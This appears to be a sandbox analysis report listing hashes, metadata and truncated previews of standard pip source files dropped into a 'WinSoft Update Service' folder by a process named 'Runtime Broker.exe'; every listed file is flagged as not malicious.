__version__.from pip._internal.exceptions import CommandError.from p

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\models.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1201
Entropy (8bit):	4.488094992184631
Encrypted:	false
SSDEEP:	24:GY1QH3BgAfryTQ3zendSjm2g45CXryJIIv:IBgwOZojm/wCXrEII
MD5:	2C75D0B2465FF59ADE6047DF9FFDA9BD
SHA1:	ECABD954DA6ED45D4144EF039D07471A0C742244
SHA-256:	1EA88156D4DB5BF6FF526BE3D9F8E10D6387A3644A84FC12CF8880624419EBCF
SHA-512:	75314A2CC2D6C7B5E40388DBB35F37608E96366CD8F4C374D14F930F70291AF6E1F170925E55BE84EC77904EC917ED8673F63C087EAC98AEE92BDAFA1CE8D67F
Malicious:	false
Preview:	"""Utilities for defining models.""".# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..import operator...class KeyBasedCompareMixin(object):. """Provides comparison capabilities that is based on a key. """.. __slots__ = ['_compare_key', '_defining_class'].. def __init__(self, key, defining_class):. self._compare_key = key. self._defining_class = defining_class.. def __hash__(self):. return hash(self._compare_key).. def __lt__(self, other):. return self._compare(other, operator.__lt__).. def __le__(self, other):. return self._compare(other, operator.__le__).. def __gt__(self, other):. return self._compare(other, operator.__gt__).. def __ge__(self, other):. return self._compare(other, operator.__ge__).. def __eq__(self, other):. return self._compare(other, operator.__eq__).. def __ne__(self, other):. return self._compare(other, operator

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\packaging.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3036
Entropy (8bit):	4.730390487909297
Encrypted:	false
SSDEEP:	48:PXnlTjezkt10HwcqDvLSwcqzpHhfaat80Sa0h009mfpsLOudIL5FYY3tozdmPjO:/djezk0HwceOwc2pBfN60n0WGmfps/dH
MD5:	E9FA9B538E80DE5E1A7C9D074BFBEDD0
SHA1:	D87A00E98E2B1CFD76E4FC659A6DFDE6F891252A
SHA-256:	28E2F1DF41176686C7293680F2484B36A10C6FDF3A0DE6827200E16476B0E916
SHA-512:	FC581ABFF9CE62759A988F9171D74F6474DF3FF924444917AD0003030952DF6F2DFE1C247CA636D93BDBE9C33AC52C1523642BA1DCD0917D56B1E7A45B519D01
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.from email.parser import FeedParser..from pip._vendor import pkg_resources.from pip._vendor.packaging import specifiers, version..from pip._internal.exceptions import NoneMetadataError.from pip._internal.utils.misc import display_path.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from email.message import Message. from typing import Optional, Tuple.. from pip._vendor.pkg_resources import Distribution...logger = logging.getLogger(__name__)...def check_requires_python(requires_python, version_info):. # type: (Optional[str], Tuple[int, ...]) -> bool. """. Check if the given Python version matches a "Requires-Python" specifier... :param version_info: A 3-tuple of ints representing a Python. major-minor-micro version to check (e.g. `sys.version_info[:3]`)... :return: `True` if the given Python version satisfies the requirement.. Otherwise, return `False`... :r

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\parallel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3404
Entropy (8bit):	4.87223662154061
Encrypted:	false
SSDEEP:	96:+5eynplbrt9fQnN3t6izkPd0KFp7/GX/KEZ9fk7TbffrD9gULb:+PtMt6akPdRJAiEnfUTLfr
MD5:	0CA606A23CA02B7DB6F4BDAC3613A554
SHA1:	BC21F021765D1839124B78D78A42BA5D2513FAFE
SHA-256:	77AC095961E73CE7303B8A722FBA6FD3C0C6DE5FF962D1F32017611E12377A9C
SHA-512:	2605B35E4C7900F7AC0ABE3E1D27EF5CA1D6D060C6597A12568E51FBE6AB9F087950B12D813BA9E1EA939644F7E0A132D8858127DDE8349DEF0C273442068B4C
Malicious:	false
Preview:	"""Convenient parallelization of higher order functions...This module provides two helper functions, with appropriate fallbacks on.Python 2 and on systems lacking support for synchronization mechanisms:..- map_multiprocess.- map_multithread..These helpers work like Python 3's map, with two differences:..- They don't guarantee the order of processing of. the elements of the iterable..- The underlying process/thread pools chop the iterable into. a number of chunks, so that for very long iterables using. a large value for chunksize can make the job complete much faster. than using the default value of 1.."""..__all__ = ['map_multiprocess', 'map_multithread']..from contextlib import contextmanager.from multiprocessing import Pool as ProcessPool.from multiprocessing.dummy import Pool as ThreadPool..from pip._vendor.requests.adapters import DEFAULT_POOLSIZE.from pip._vendor.six import PY2.from pip._vendor.six.moves import map..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\pkg_resources.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	4.50593653151634
Encrypted:	false
SSDEEP:	24:1TJDbduQvsezkvCMacNrA0kbqAubqiAAl4zoofWMmAiQKiuixMdEoxT4ZvAB:zoQv1zkKNcNr5c7iq9AOsyh3iQPFxMdJ
MD5:	3DBA90D2B58D47618516E8D60255D820
SHA1:	ADD0B2D87A4A254135A07B5FCB5E086BD296E90B
SHA-256:	657FA4ED5E6AFDA356C83B1EF769CDEE8ACDD5A0A944BB1AC73A64059D572B35
SHA-512:	C116BB354CC7D11D13A6ECAC5DE85A239355AD41C45B209EDB3FE16FB21E3E1C521018F10B1EF67C9C79D3C0B4F3AFC330771E8CA4BA33BC6F1B46D71627FBCD
Malicious:	false
Preview:	from pip._vendor.pkg_resources import yield_lines.from pip._vendor.six import ensure_str..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Dict, Iterable, List...class DictMetadata(object):. """IMetadataProvider that reads metadata files from a dictionary.. """. def __init__(self, metadata):. # type: (Dict[str, bytes]) -> None. self._metadata = metadata.. def has_metadata(self, name):. # type: (str) -> bool. return name in self._metadata.. def get_metadata(self, name):. # type: (str) -> str. try:. return ensure_str(self._metadata[name]). except UnicodeDecodeError as e:. # Mirrors handling done in pkg_resources.NullProvider.. e.reason += " in {} file".format(name). raise.. def get_metadata_lines(self, name):. # type: (str) -> Iterable[str]. return yield_lines(self.get_metadata(name)).. def metadata_isdir(s

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\setuptools_build.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5058
Entropy (8bit):	4.709132846915233
Encrypted:	false
SSDEEP:	96:k/zkIBye2pGDULhb1T8B94gMGlbJNath8H0Kb4SmTygRuBYGdYpcKN:krkIoRpGIvinllLaRpRkDyTN
MD5:	7DE3C54DA5799858FD58D22A6A8C0C90
SHA1:	87C667CC9AA576A9E0EA48BFF5201D44A4C5E44A
SHA-256:	1352ACC08EF07CD9C20C4E51E86F1CF596C1C84369BBB36AA1C8D8DBA3C2403C
SHA-512:	C85C854E2FD81EE215F904871A0393C4B6B032EA6B244A98A6DBAE28169563AD4D245ACB8CBA430F21656D4CDE181130031457CA90C0CDB620868D942C66F478
Malicious:	false
Preview:	import sys..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional, Sequence..# Shim to wrap setup.py invocation with setuptools.#.# We set sys.argv[0] to the path to the underlying setup.py file so.# setuptools / distutils don't take the path to the setup.py to be "-c" when.# invoking via the shim. This avoids e.g. the following manifest_maker.# warning: "warning: manifest_maker: standard file '-c' not found".._SETUPTOOLS_SHIM = (. "import sys, setuptools, tokenize; sys.argv[0] = {0!r}; __file__={0!r};". "f=getattr(tokenize, 'open', open)(__file__);". "code=f.read().replace('\\r\\n', '\\n');". "f.close();". "exec(compile(code, __file__, 'exec'))".)...def make_setuptools_shim_args(. setup_py_path, # type: str. global_options=None, # type: Sequence[str]. no_user_config=False, # type: bool. unbuffered_output=False # type: bool.):. # type: (...) -> List[str]. """. Get setuptools comma

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\subprocess.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9907
Entropy (8bit):	4.547418036455261
Encrypted:	false
SSDEEP:	192:WzkP80+ZsJ3T0Y4Lm/KcTkIicKlDzU5gB/xme+dC:We8pU0Y4LkKc4ZaK/Ks
MD5:	54FC7226D6F57DF374D61741AD5F6757
SHA1:	AF82EFAC348651797E3074E7D52C4A3FEE7AC2B4
SHA-256:	B23748DFED2C17BFEAAA43D737AB0D1D856D68DDF82E8A0B2F2E641A278364DE
SHA-512:	6ABB1C4BE0EF71B8DAE4880F0EF27C88E4F725BEAC74F045550921E3A2852C894DAF78D8D2ACA0AC737D8156C879660CC51B3BBC3E849725C0C6ED0AC3999E1B
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.import os.import subprocess..from pip._vendor.six.moves import shlex_quote..from pip._internal.cli.spinners import SpinnerInterface, open_spinner.from pip._internal.exceptions import InstallationError.from pip._internal.utils.compat import console_to_str, str_to_display.from pip._internal.utils.logging import subprocess_logger.from pip._internal.utils.misc import HiddenText, path_to_display.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Callable, Iterable, List, Mapping, Optional, Text, Union.. CommandArgs = List[Union[str, HiddenText]]...LOG_DIVIDER = '----------------------------------------'...def make_command(*args):. # type: (Union[str, HiddenText, CommandArgs]) -> CommandArgs. """. Create a CommandArgs object.. """. command_args = [] # type: CommandArgs. for arg in args:. # Check for list instead of CommandArgs since CommandArgs is.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\temp_dir.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	8845
Entropy (8bit):	4.441074027302487
Encrypted:	false
SSDEEP:	96:gyzkEkim+xwDQyxbF6pu/iVJB6cDuJKs98LN/XLU7p8nsVtMqvzb90ZkJ4ltwKcx:Bk+mbEyxh64Obcv3tXbmltbA1
MD5:	EDB607649A299FCC2665BD6937999857
SHA1:	39566A1AAB908E540F0B82F02665B5AAA9E206B2
SHA-256:	726169608FF954379752C1AF89AF6350D87C5C429762FA469488BF8AAD8C4555
SHA-512:	6590133F1F5675355E88C234C9CE14F71FA3B8B817F7EECAB126627095BD5A6E3CE95AE12233E51C7E71E146C5BA3632520C63641D272927EC0E8C399B562E13
Malicious:	false
Preview:	from __future__ import absolute_import..import errno.import itertools.import logging.import os.path.import tempfile.from contextlib import contextmanager..from pip._vendor.contextlib2 import ExitStack.from pip._vendor.six import ensure_text..from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.misc import enum, rmtree.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, Iterator, Optional, TypeVar, Union.. _T = TypeVar('_T', bound='TempDirectory')...logger = logging.getLogger(__name__)...# Kinds of temporary directories. Only needed for ones that are.# globally-managed..tempdir_kinds = enum(. BUILD_ENV="build-env",. EPHEM_WHEEL_CACHE="ephem-wheel-cache",. REQ_BUILD="req-build",.)..._tempdir_manager = None # type: Optional[ExitStack]...@contextmanager.def global_tempdir_manager():. # type: () -> Iterator[None]. global _tempdir_manager. with ExitStack() as stack:. old_tempdir_ma

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\typing.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	4.732625056842326
Encrypted:	false
SSDEEP:	24:eAhpWEsqWeWBqt55W8XoYxtqAZYPETnZVLxAqHJzEPSvuvKdVV+GVhGVxnF:HWbqWeWBqxBXoYxtKwXFnzEKvu+OnF
MD5:	10BE07B380BDBCED18223A10C9A7FC06
SHA1:	6804B42CF7172FFE3EBBD41295FC8E67B9934A4E
SHA-256:	C6463039E1E57F8CEC1D70430B8DF5D07B44AB08507185C53EADA1DF94DCAE5D
SHA-512:	7AE6A1A9DCDB2DA9C69E4690F6B9D204332DE1EC7DDBBC7BA0C3D46A8C7C76D53C3CA531D63215DC0C51F83530CA819203A752BC638CDC2AE570383B1B1A1626
Malicious:	false
Preview:	"""For neatly implementing static typing in pip...`mypy` - the static type analysis tool we use - uses the `typing` module, which.provides core functionality fundamental to mypy's functioning...Generally, `typing` would be imported at runtime and used in that fashion -.it acts as a no-op at runtime and does not have any run-time overhead by.design...As it turns out, `typing` is not vendorable - it uses separate sources for.Python 2/Python 3. Thus, this codebase can not expect it to be present..To work around this, mypy allows the typing import to be behind a False-y.optional to prevent it from running at runtime and type-comments can be used.to remove the need for the types to be accessible directly during runtime...This module provides the False-y guard in a nicely named fashion so that a.curious maintainer can reach here to read this...In pip, all static-typing related imports should be guarded as follows:.. from pip._internal.utils.typing import MYPY_CHECK_RUNNING.. if MYPY_CH

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\unpacking.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9488
Entropy (8bit):	4.4749289819498355
Encrypted:	false
SSDEEP:	192:Dkhorbb5aplpq0E36AVzv7QtjhvpExrxXVdw:XrbSlQ0EqAUMe
MD5:	22DB2CA7D393100A3D65918F306C4926
SHA1:	FFF0611877A6E054EA52FD29F5CA0B37643F2484
SHA-256:	60501C921AAABE67A103C29A9F9BDDDDBD6437FF5369FAA63A4E1BFB2CF87E1A
SHA-512:	B0AF6F6B614DEF91A1BE67E9594769740BFF8DDAE441D977F4462C51D0C41722DC7F70C69E9F24E15857860F373B06D723997FF136A66BB42F4AC131D5282C04
Malicious:	false
Preview:	"""Utilities related archives.."""..from __future__ import absolute_import..import logging.import os.import shutil.import stat.import tarfile.import zipfile..from pip._internal.exceptions import InstallationError.from pip._internal.utils.filetypes import (. BZ2_EXTENSIONS,. TAR_EXTENSIONS,. XZ_EXTENSIONS,. ZIP_EXTENSIONS,.).from pip._internal.utils.misc import ensure_dir.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Iterable, List, Optional, Text, Union. from zipfile import ZipInfo...logger = logging.getLogger(__name__)...SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + TAR_EXTENSIONS..try:. import bz2 # noqa. SUPPORTED_EXTENSIONS += BZ2_EXTENSIONS.except ImportError:. logger.debug('bz2 module is not available')..try:. # Only for Python 3.3+. import lzma # noqa. SUPPORTED_EXTENSIONS += XZ_EXTENSIONS.except ImportError:. logger.debug('lzma module is not available')...def current_umask():. # type:

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\urls.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1527
Entropy (8bit):	4.752123726311888
Encrypted:	false
SSDEEP:	24:Zmd/ayd/xemvezkvbZlAF7W28fDHc3XgrC0ilmyfoYCSLGMDVC98+/UXO6s27sul:ZhzkjZlAF7WPbc3XgMbwYCSLGMJCC0Ul
MD5:	4426F89EC41A4572E08790E93BF07E51
SHA1:	553F984CAE7339B961AC252BC2E80060D5AC6903
SHA-256:	AB6AF0D643228A283F5D9728C894AC58C250A98C3EDB0526ACCA124F89825BF2
SHA-512:	10D662D4F80672FE050740203C4D4250A3ACD1F984CD665FBF8830953F81B02850275C6FA99E12BCE5003E9E15A83B821390D8BA7D4A08128471125C0D18C451
Malicious:	false
Preview:	import os.import sys..from pip._vendor.six.moves.urllib import parse as urllib_parse.from pip._vendor.six.moves.urllib import request as urllib_request..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Optional, Text, Union...def get_url_scheme(url):. # type: (Union[str, Text]) -> Optional[Text]. if ':' not in url:. return None. return url.split(':', 1)[0].lower()...def path_to_url(path):. # type: (Union[str, Text]) -> str. """. Convert a path to a file: URL. The path will be made absolute and have. quoted path parts.. """. path = os.path.normpath(os.path.abspath(path)). url = urllib_parse.urljoin('file:', urllib_request.pathname2url(path)). return url...def url_to_path(url):. # type: (str) -> str. """. Convert a file: URL to a path.. """. assert url.startswith('file:'), (. "You can only turn file: urls into filenames (not {url!r})". .format(**locals())).. _,

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\virtualenv.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3706
Entropy (8bit):	4.832606267503026
Encrypted:	false
SSDEEP:	96:r/zkw5SYf0VfZjR1kOJK1VTg3pf5VjeY3jAGVEod7MOUIiy7dQl/:rrkAfIfdR6OcVTABtpAbox/UIDKl/
MD5:	CD999B93461FCB5BD50F3978F40E1B89
SHA1:	F2B1473EFAB6597D274E71F043CBF6F1FD290F4A
SHA-256:	7CD1AB469FBC42634BE4ECD76A305DFB3ECF6F03ACC755D8E86F8054C0217ECA
SHA-512:	FA3BB25B70051B8039112ADDBBCBC5D944C67F40C099941823C50841A7644E8E891E825826168E5E5E93E3C47FF3CBE28F7645CF1D9843DF3D26B33992FFD858
Malicious:	false
Preview:	from __future__ import absolute_import..import io.import logging.import os.import re.import site.import sys..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional..logger = logging.getLogger(__name__)._INCLUDE_SYSTEM_SITE_PACKAGES_REGEX = re.compile(. r"include-system-site-packages\s=\s(?P<value>true\|false)".)...def _running_under_venv():. # type: () -> bool. """Checks if sys.base_prefix and sys.prefix match... This handles PEP 405 compliant virtual environments.. """. return sys.prefix != getattr(sys, "base_prefix", sys.prefix)...def _running_under_regular_virtualenv():. # type: () -> bool. """Checks if sys.real_prefix is set... This handles virtual environments created with pypa's virtualenv.. """. # pypa/virtualenv case. return hasattr(sys, 'real_prefix')...def running_under_virtualenv():. # type: () -> bool. """Return True if we're running inside a virtualenv, False otherwi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\wheel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7303
Entropy (8bit):	4.6674837898449475
Encrypted:	false
SSDEEP:	192:Y8keVpdRsfJu9s7lYDeRzShKZJwbs8FV5B41j:YcV7RIJHYqR2hoabd7B41j
MD5:	F6DE95998B05F59B8915856798E0E964
SHA1:	A30FBB4DDBCCFB5E2AA48A2C9BA63C3367070E41
SHA-256:	C05CE7DE1F06A98BE0B3258F66D5329F445BDCC2739ADC8FDE8C0C3A12A798BD
SHA-512:	EDE60DD9CDE19DAB278CFC15E582B85EEBD380A4090366CCAA5A719476459CC1EB71F8D4A0C9EEF725B2C77745AF720D55FCC4EC2B0CD0334691ECF758EABACA
Malicious:	false
Preview:	"""Support functions for working with wheel files.."""..from __future__ import absolute_import..import logging.from email.parser import Parser.from zipfile import ZipFile..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.pkg_resources import DistInfoDistribution.from pip._vendor.six import PY2, ensure_str..from pip._internal.exceptions import UnsupportedWheel.from pip._internal.utils.pkg_resources import DictMetadata.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from email.message import Message. from typing import Dict, Tuple.. from pip._vendor.pkg_resources import Distribution..if PY2:. from zipfile import BadZipfile as BadZipFile.else:. from zipfile import BadZipFile...VERSION_COMPATIBLE = (1, 0)...logger = logging.getLogger(__name__)...class WheelMetadata(DictMetadata):. """Metadata provider that maps metadata decoding exceptions to our. internal exception type.. """. def __init__(self, metada

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\vcs\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	617
Entropy (8bit):	4.766012676615815
Encrypted:	false
SSDEEP:	12:AU7ndNAXB62WR1L/SdBZnM4mSMWgeXgkJVEOwsffnBu:A1YNL/y/nM4Y3eXguVoofBu
MD5:	52034A6AAE27C9944A7E57D2B2AA175A
SHA1:	3DBC097FAC541167927C453596D6ED6B37AC24CE
SHA-256:	BE2271251A9113F99549CBA6F396E04085C077AA34A3316DD7C5690BEA8826B3
SHA-512:	9AA4FAF22728763E48CA1943FA523A188AD6C2EBEE503C4F41BF60782369893EDF515062556E97F16412B093D85CD71D2ECF54761D61FF80FD9F554F27D72991
Malicious:	false
Preview:	# Expose a limited set of classes and functions so callers outside of.# the vcs package don't need to import deeper than `pip._internal.vcs`..# (The test directory and imports protected by MYPY_CHECK_RUNNING may.# still need to import from a vcs sub-package.).# Import all vcs modules to register each VCS in the VcsSupport object..import pip._internal.vcs.bazaar.import pip._internal.vcs.git.import pip._internal.vcs.mercurial.import pip._internal.vcs.subversion # noqa: F401.from pip._internal.vcs.versioncontrol import ( # noqa: F401. RemoteNotFoundError,. is_url,. make_vcs_requirement_url,. vcs,.).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\vcs\bazaar.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3888
Entropy (8bit):	4.605422692756952
Encrypted:	false
SSDEEP:	96:X8jzQgqzOTJuoHePk+7yqBzFWbX0TOcUTEBF:XKQgq6PHes5qBJMX0TOcUTcF
MD5:	560C08149DA1A1EF8D0190F561405D81
SHA1:	501C86F43BCD3FFDC2921173365F1CEAE20ED4B1
SHA-256:	26B4AF5AA41856BFE3410CE2EAD5CA8167687E3E3913C23C8EDED4C21D5568E4
SHA-512:	201D4ADC3473C701BFCAB76F182236FA11933E060F01EB32D13D4AA208F68BD3FEF9D8105F3D5DBB2D94AAF3660E27A4B1D6445FB6976FDC036280D3A2682932
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import logging.import os..from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.utils.misc import display_path, rmtree.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs.versioncontrol import VersionControl, vcs..if MYPY_CHECK_RUNNING:. from typing import Optional, Tuple.. from pip._internal.utils.misc import HiddenText. from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions...logger = logging.getLogger(__name__)...class Bazaar(VersionControl):. name = 'bzr'. dirname = '.bzr'. repo_name = 'branch'. schemes = (. 'bzr', 'bzr+http', 'bzr+https', 'bzr+ssh', 'bzr+sftp', 'bzr+ftp',. 'bzr+lp',. ).. def __init__(self, args, *kwargs):.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\vcs\git.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	15006
Entropy (8bit):	4.4526860117663185
Encrypted:	false
SSDEEP:	192:XUyyC2TFt3Eb4B3SrThgrxhsHirzwvBsaEBKpzW6kTP7AhBJ1V5QZ0W:7KFtnCTysEwZsmkTP7Ah/7yZ9
MD5:	06724EE5DE3F778B250E4D8FCF518E63
SHA1:	6339BF99FB9BD23139FE018E64C1989D22B682DA
SHA-256:	D02C17420FADC0F913DC792E5EA6CEBA7FF464550442FD04F015FBEA4E333540
SHA-512:	14300D4E877B486075CF123A0E27711A87A5D1FF3AB707588190128E7E3E0A8AA128D2A9137714E36E17B036839093E24D7976D5635EF77A7769C25C0B7C0856
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import logging.import os.path.import re..from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.six.moves.urllib import parse as urllib_parse.from pip._vendor.six.moves.urllib import request as urllib_request..from pip._internal.exceptions import BadCommand, SubProcessError.from pip._internal.utils.misc import display_path, hide_url.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.vcs.versioncontrol import (. RemoteNotFoundError,. VersionControl,. find_path_to_setup_from_repo_root,. vcs,.)..if MYPY_CHECK_RUNNING:. from typing import Optional, Tuple.. from pip._internal.utils.misc import HiddenText. from pip._internal.vcs.versioncontrol import AuthInfo, RevO

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\vcs\mercurial.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5162
Entropy (8bit):	4.517997402134033
Encrypted:	false
SSDEEP:	96:XxyzigJEKtbhIXPklyQjFcHERFeiRqAeuuFLG:XMzJEMbhIXsYQjFcHERFeJAehG
MD5:	B68A61C7626AA1FF15F00A79B25CF672
SHA1:	ED1F0E45D3BBD0EA6244A75F5FE7929AF639FBD1
SHA-256:	173086998CD566F07EBF233BDDF29C424D81E2330D5C69D7950D9B27B9E68253
SHA-512:	0A7FC6A02AC60626356ACE956A57DFF8FA751DDA9FB9FC94954450BF61F48281184CAE1DD5A1960F1BDF81E3F8CC05839192DD12CC94EBADCD173302E0E262D8
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import logging.import os..from pip._vendor.six.moves import configparser..from pip._internal.exceptions import BadCommand, SubProcessError.from pip._internal.utils.misc import display_path.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs.versioncontrol import (. VersionControl,. find_path_to_setup_from_repo_root,. vcs,.)..if MYPY_CHECK_RUNNING:. from pip._internal.utils.misc import HiddenText. from pip._internal.vcs.versioncontrol import RevOptions...logger = logging.getLogger(__name__)...class Mercurial(VersionControl):. name = 'hg'. dirname = '.hg'. repo_name = 'clone'. schemes = (. 'hg', 'hg+file', 'hg+http', 'hg+ht

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\vcs\subversion.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	12400
Entropy (8bit):	4.4664934940769045
Encrypted:	false
SSDEEP:	192:X4GFirIJaAfeYSSBJ3kkm/rvF4Yd6t3WGRS8/XHs5ke:InufQS/3yr94ys308PHsh
MD5:	FD2A8EBCD2DE396F2CCAE9B34724CBBF
SHA1:	8B3CDDEDB2FFAB54B0A75A7B14BD5FD2C17F8AD1
SHA-256:	F27DA643EA9DBBB7FC2AE2EDDF20C74D0049BBB23555F3BD0924CC722A2E7B31
SHA-512:	6B4D90A9D3C46F2FE494C76121900A99B18663B1C8682F9E25312F5F4800FA3ABFFC033C2DC4E42A31FC09AFC372958B32842D0C3D79917946509B6CB30F43D3
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import logging.import os.import re..from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import (. display_path,. is_console_interactive,. rmtree,. split_auth_from_netloc,.).from pip._internal.utils.subprocess import make_command.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.vcs.versioncontrol import VersionControl, vcs.._svn_xml_url_re = re.compile('url="([^"]+)"')._svn_rev_re = re.compile(r'committed-rev="(\d+)"')._svn_info_xml_rev_re = re.compile(r'\srevision="(\d+)"')._svn_info_xml_url_re = re.compile(r'<url>(.)</url>')...if MYPY_CHECK_RUNNING:. from typing import Optional, Tuple.. from pip._internal.utils.misc import HiddenText. from pip._internal.utils.subprocess import CommandArgs. from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions...l

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\vcs\versioncontrol.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	26079
Entropy (8bit):	4.396672808787921
Encrypted:	false
SSDEEP:	384:bcPyf/or0q/+2l03p8bRwdXlLQYAY/nOZC5o6emJgT/jlOoN5:bcC/s0q/O8b6xF/rGC5xDJgT/jldz
MD5:	B9C838597B559514C78FF570509EBCD0
SHA1:	4577849BA825D5223BD2077713C37FBCE356650E
SHA-256:	FAFF93D5F83E652A8BA0ECC8B60515AE5E94F7A25938470D9DE6BA133F1583AD
SHA-512:	8CB91301016A9CBF0E567ED2FEC9E64F43665B7955DD71775484AEECA2672669991525573D89ED2A73DFE8A82206E8BAF6D03CB625FBBEC1F943568D6FF362B3
Malicious:	false
